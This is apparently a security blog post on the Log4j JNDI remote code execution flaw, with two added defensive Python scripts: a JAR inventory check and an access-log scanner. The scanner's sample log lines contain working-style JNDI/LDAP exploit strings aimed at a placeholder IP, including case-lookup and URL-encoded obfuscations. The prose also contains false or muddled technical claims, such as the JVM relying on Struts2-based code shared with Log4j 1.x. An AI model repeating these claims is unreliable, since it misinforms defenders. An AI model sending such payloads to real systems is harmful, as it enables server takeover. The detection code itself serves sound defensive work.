One of the most popular logging libraries in Java, Log4j, was recently discovered to have serious cybersecurity vulnerabilities. While the project is working hard to patch these holes, it’s important that everyone update their installations of the library as soon as possible to protect themselves from attack. The vulnerability was first discovered by Alibaba’s security team, who say it could be disastrous for your business, especially if you run Log4j on a cloud service such as Amazon Web Services, Microsoft Azure or others.
What is this vulnerability?
The Log4j Java library, part of Apache’s Jakarta Project and one of the most popular logging libraries for Java applications, has a critical-severity security vulnerability that lets attackers gain full access to, and control over, the systems that use it. If it is left unpatched, or if an attacker gets into your servers and gains administrative privileges before you patch, they can run malicious commands to compromise the server at will. Whether they want to steal sensitive data, install ransomware or carry out other nefarious activity, flaws in Log4j’s code mean they could probably do so undetected. Although these vulnerabilities have been patched, many companies have likely not yet applied the patches because they no longer receive regular updates from their vendor. Since many businesses don’t bother updating widely used or legacy components like Log4j, it’s best to be proactive about securing your organization and apply patches as soon as they are released. As with many attacks we’ve seen before, it is not especially hard for attackers to place malicious payloads in the logs coming out of apps and databases, and once they are there, it’s only a matter of time before those malicious messages make their way back into IT infrastructure. That means trouble for businesses large and small worldwide.
What you need to know right now
This looks to be bad. Really bad. Even if you aren’t using Log4j yourself, your business could still fall victim: countless SaaS companies out there are likely running it, and what's worse, the level of sophistication required to execute a successful attack is remarkably low. Sub-script-kiddie low.
Any company running a Java Virtual Machine (JVM) might be affected, since the JVM uses libraries based on Apache Struts2, which contains portions of unmaintained code used by Log4j 1.x; or at least it did until it was patched almost three weeks ago.
What's worse, this exploit does not require authentication to succeed, and even though the sun has been setting on Java for quite some time, Java is still everywhere, including the home devices and routers of all you work-from-home types.
How does the Log4j exploit work?
This new attack against Log4j lets attackers execute code on systems running vulnerable versions of the open-source library. An attacker can pass a command to the logging library hidden in the log data itself; when the software receives it, the command is executed rather than simply written to the log. The exploit relies on the library performing network lookups: it causes a log message to be interpreted as a URL, and any payload retrieved from that URL runs with full privileges. That threatens to hand over complete control of systems and servers, leaving them exposed to anything from data exfiltration to devastating ransomware. With one simple line of code, users are opened up to one potentially disastrous threat after another.
How do I fix this problem?
With many companies relying on outdated or unpatched instances of Log4j, it’s no surprise that many are still exposed to dangerous vulnerabilities. To determine whether your company’s infrastructure is at risk, we recommend checking with each IT department first; they’ll be best placed to identify whether their systems are affected and what steps to take next.
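As an added example that is not from the article, here is a Python inventory check that the IT teams mentioned above could run against a server's deployment directories: it opens every JAR (including JARs nested inside application archives), reads the log4j-core version that Maven records in pom.properties, and reports whether the JNDI lookup class is bundled. The class path and pom.properties path are assumptions about how log4j-core 2.x is packaged; the sample JARs and the helper names (inspect_jar_bytes, scan_tree, build_sample_jar, demo) are constructed here.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Optional

# Assumed layout of log4j-core 2.x: the JNDI lookup is implemented by this
# class, so its presence in a JAR on the classpath means the lookup feature
# is available at runtime. Maven also records the artifact version here.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def _version_from_pom(zf: zipfile.ZipFile) -> Optional[str]:
    """Return the version line from pom.properties, or None if the JAR is not log4j-core."""
    try:
        text = zf.read(POM_PROPERTIES).decode("utf-8", errors="replace")
    except KeyError:
        return None
    m = re.search(r"^version=(.+)$", text, re.MULTILINE)
    return m.group(1).strip() if m else None


def inspect_jar_bytes(data: bytes, name: str = "<memory>") -> dict:
    """Describe one JAR: its log4j-core version (if it is one) and whether
    JndiLookup.class is bundled anywhere, including inside nested JARs such
    as Spring Boot's BOOT-INF/lib or an uber-JAR."""
    info = {"jar": name, "log4j_core_version": None, "has_jndi_lookup": False, "nested": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        info["log4j_core_version"] = _version_from_pom(zf)
        info["has_jndi_lookup"] = JNDI_LOOKUP_CLASS in names
        for entry in names:
            if entry.lower().endswith(".jar"):
                inner = inspect_jar_bytes(zf.read(entry), f"{name}!{entry}")
                info["nested"].append(inner)
                if inner["has_jndi_lookup"]:
                    info["has_jndi_lookup"] = True
    return info


def scan_tree(root) -> list:
    """Walk a directory tree and return every JAR that bundles the JNDI lookup class."""
    hits = []
    for path in Path(root).rglob("*.jar"):
        info = inspect_jar_bytes(path.read_bytes(), str(path))
        if info["has_jndi_lookup"]:
            hits.append(info)
    return hits


def build_sample_jar(version: Optional[str], include_jndi: bool,
                     nested: Optional[bytes] = None) -> bytes:
    """Construct an in-memory JAR mimicking log4j-core's layout (test data, not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PROPERTIES,
                        f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        if nested is not None:
            zf.writestr("BOOT-INF/lib/log4j-core-sample.jar", nested)
    return buf.getvalue()


def demo() -> list:
    """Three constructed cases: a core JAR with the class, one without it,
    and an application JAR that nests the first one."""
    with_lookup = build_sample_jar("2.x-SAMPLE", True)
    without_lookup = build_sample_jar("2.y-SAMPLE", False)
    app = build_sample_jar(None, False, nested=with_lookup)
    return [inspect_jar_bytes(data, name) for data, name in
            ((with_lookup, "core.jar"), (without_lookup, "core-stripped.jar"), (app, "app.jar"))]


if __name__ == "__main__":
    for info in demo():
        flag = "JndiLookup present" if info["has_jndi_lookup"] else "no JndiLookup"
        print(f"{info['jar']:20s} version={info['log4j_core_version']}  {flag}")
```

Run `scan_tree("/opt/myapp")` (path is a placeholder) and compare each reported version against the project's current advisory before deciding what to update. Treat a clean result as a lead rather than a verdict: a shaded copy of log4j-core can live under a relocated package name, which this check will not see.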
If you're in the industry, you can filter out traffic that is auto-scanning for this vulnerability. However, the exploit string is all too easy to obfuscate, so while this is low-hanging fruit, it alone won't protect your network. The exploit also leverages LDAP; if you can block all LDAP traffic, I would recommend doing so.
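One way to act on this filtering advice, and on the lookup behaviour described under "How does the Log4j exploit work?", as an added example that is not part of the original post: a small Python scanner for web-server access logs that resolves nested lookup syntax before matching, so the disguised forms a plain search for the literal string misses are still flagged. The sample log lines, the IP addresses (documentation ranges) and the helper names (normalize, classify, scan) are constructed for the example; the page does not supply them.

```python
import re
from urllib.parse import unquote

# Log4j 2.x substitutes ${name:argument} lookups inside logged messages; the
# JNDI lookup is the one this vulnerability abuses. Scanners hide the word
# "jndi" behind other lookups, so a grep for the literal string misses them.
# Before matching, this normalizer collapses the lookups that can be resolved
# statically: case lookups (${lower:X}, ${upper:X}) and the ${name:-default}
# form, whose result is the default whenever the named lookup resolves to nothing.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")      # innermost ${...}, no nesting inside
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve(match):
    body = match.group(1)
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if lowered.startswith("jndi:"):
        return match.group(0)            # the thing we are looking for: keep it intact
    if ":-" in body:
        # ${lookup:key:-default}: treat the lookup as unresolvable and take the default.
        return body.split(":-", 1)[1]
    return match.group(0)                # unknown lookup (${date:...}, ${env:...}): leave as-is


def normalize(line: str) -> str:
    """URL-decode once, then resolve innermost lookups until nothing changes."""
    text = unquote(line)
    while True:
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved


def classify(line: str) -> str:
    """'jndi'       a JNDI lookup is present after normalization
       'suspicious' lookup syntax survives and mentions jndi somewhere
       'lookup'     other lookup syntax in a request (rare in legitimate traffic)
       'clean'      nothing of note"""
    norm = normalize(line)
    if JNDI_LOOKUP.search(norm):
        return "jndi"
    if "${" in norm and "jndi" in norm.lower():
        return "suspicious"
    if "${" in norm:
        return "lookup"
    return "clean"


# Constructed sample access-log lines (documentation IP ranges; not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:11 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def scan(lines):
    """Return (verdict, line) pairs for every line that is not clean."""
    return [(classify(line), line) for line in lines if classify(line) != "clean"]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG):
        print(f"{verdict:10s} {line}")
```

Because the third sample line only becomes `${jndi:...}` after the inner case lookups are folded, it is exactly the kind of entry a literal-string filter lets through; the fourth shows why decoding comes first. Feed the scanner your proxy or application logs rather than relying on it at the edge, and remember that, as the text says, this is detection of the low-hanging fruit, not a substitute for patching.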
Finally, if you aren't already doing so, you might want to think about a 24x7 Security Operations Center (SOC) service from an MSSP. Intelligence-driven security services use real-time threat information to hunt for threats that may be lurking in already-compromised parts of your environment, like the zero-day above that almost all security tools have missed.
In the meantime: patch. Quickly.